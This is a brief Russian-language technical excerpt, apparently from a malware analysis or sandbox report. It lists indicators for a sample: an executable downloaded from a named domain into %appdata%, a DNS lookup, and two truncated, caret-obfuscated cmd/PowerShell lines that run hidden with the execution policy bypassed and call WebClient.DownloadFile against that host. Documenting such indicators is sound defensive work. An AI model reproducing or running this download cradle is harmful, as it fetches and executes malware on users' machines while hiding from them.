Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErs^H^eLL^.eXE -eXecUT^IOn^p^oLi^Cy^ ^by^p^a^SS^ -^N^OPRoFIlE -w^iNDo^ws^tYL^E ^HI^d^dEN (NEW-ObJ^Ect S^ys^tEM.^N^et^.^we^B^C^L^iENt^).d^OWnl^OadF^Ile('http://flowers-my...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "POWErs^H^eLL^.eXE -eXecUT^IOn^p^oLi^Cy^ ^by^p^a^SS^ -^N^OPRoFIlE -w^iNDo^ws^tYL^E ^HI^d^dEN (NEW-ObJ^Ect S^ys^tEM.^N^et^.^we^B^C^L^iENt^).d^OWnl^OadF^Ile('http://flowers-my...' (со скрытым окном)